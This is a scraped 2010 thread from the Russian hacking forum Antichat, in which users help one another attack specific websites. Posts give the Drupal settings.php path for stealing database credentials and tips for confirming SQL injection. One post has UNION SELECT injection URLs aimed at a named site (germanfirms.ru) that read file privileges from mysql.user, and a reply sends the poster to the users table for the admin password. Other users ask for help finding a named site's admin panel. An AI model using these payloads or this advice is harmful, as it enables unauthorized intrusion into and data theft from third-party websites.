ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #13491  
Старый 29.05.2010, 20:17
Аватар для Konqi
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от .:[melkiy]:.  
мда
ему нужен файл где хранится хост\логин\пасс для коннекта к бд
ну в джумле это configuration.php a в друпал такое есть? не знаю
 
Ответить с цитированием

  #13492  
Старый 29.05.2010, 20:19
Аватар для GOGA075
GOGA075
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744

Репутация: 18
По умолчанию

.:[melkiy]:. Ну хоть до кого то дошло!!

Konqi В друпал таких файлов нету, вот поэтому и спрашиваю!
 
Ответить с цитированием

  #13493  
Старый 29.05.2010, 20:37
Аватар для DrakonSerg
DrakonSerg
Познающий
Регистрация: 16.04.2009
Сообщений: 81
Провел на форуме:
1096131

Репутация: 45
По умолчанию

2 Konqi как можно угадать сайт без малейших намеков? )) или совпадение, или ты экстрасенс, блин... ))
Есть вариант от админки пасс вытащить?
 
Ответить с цитированием

  #13494  
Старый 29.05.2010, 20:47
Аватар для Konqi
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от DrakonSerg  
2 Konqi как можно угадать сайт без малейших намеков? )) или совпадение, или ты экстрасенс, блин... ))
Есть вариант от админки пасс вытащить?

даю гарантию что твой сайт уже несколько раз поимели,в кэше googla хранится, а по поводу админки даже не смотрел
 
Ответить с цитированием

  #13495  
Старый 29.05.2010, 22:34
Аватар для попугай
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
Сообщение от GOGA075  
.:[melkiy]:. Ну хоть до кого то дошло!!

Konqi В друпал таких файлов нету, вот поэтому и спрашиваю!
В Друпал
./sites/default/settings.php
 
Ответить с цитированием

  #13496  
Старый 29.05.2010, 22:40
Аватар для warlok
warlok
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418

Репутация: 386
По умолчанию

Цитата:
Сообщение от GOGA075  
А кто подскажет где в движках Drupal хранятся логин и пароль от БД?
файл /sites/default/settings.php а информация в переменной $db_url
 
Ответить с цитированием

  #13497  
Старый 30.05.2010, 09:53
Аватар для Ctacok
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Цитата:
Сообщение от DrakonSerg  
является ли уязвимым сайт, выдающий на кавычку в первом случае:


во втором случае:

???
вбей 'abcd, если abcd в ошибке будет, то крути.

Насчёт drupal, смотри /sites/название сайта, а вообще может быть любое/settings.php
В default редко бывают доступы.
 
Ответить с цитированием

  #13498  
Старый 30.05.2010, 12:51
Аватар для CyberHunter
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031

Репутация: 256


Отправить сообщение для CyberHunter с помощью ICQ
По умолчанию

Скажите как проверить file_priv?
Вот например инъекция:
Код:
http://germanfirms.ru/products.php?id=63+union+select+1+--+
Делаю так:
Код:
http://germanfirms.ru/products.php?id=63+union+select+file_priv+from+mysql.user+where+user='db156426_4'+--+
Не выводит ни 'Y' ни 'N'. Что не так?
И как я понимаю, если будет 'Y', то можно будет залить файл?
 
Ответить с цитированием

  #13499  
Старый 30.05.2010, 13:05
Аватар для AC//DC
AC//DC
Познающий
Регистрация: 28.07.2009
Сообщений: 98
Провел на форуме:
247684

Репутация: 136
По умолчанию

Цитата:
Сообщение от CyberHunter  
Скажите как проверить file_priv?
Вот например инъекция:
Код:
http://germanfirms.ru/products.php?id=63+union+select+1+--+
Делаю так:
Код:
http://germanfirms.ru/products.php?id=63+union+select+file_priv+from+mysql.user+where+user='db156426_4'+--+
Не выводит ни 'Y' ни 'N'. Что не так?
И как я понимаю, если будет 'Y', то можно будет залить файл?
попробуй таблицу users
там админ
 
Ответить с цитированием

  #13500  
Старый 30.05.2010, 13:06
Аватар для LokbatanLi
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319

Репутация: -16
Отправить сообщение для LokbatanLi с помощью ICQ
По умолчанию

Цитата:
biophys.am
если мойно помоqите наыти админку
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ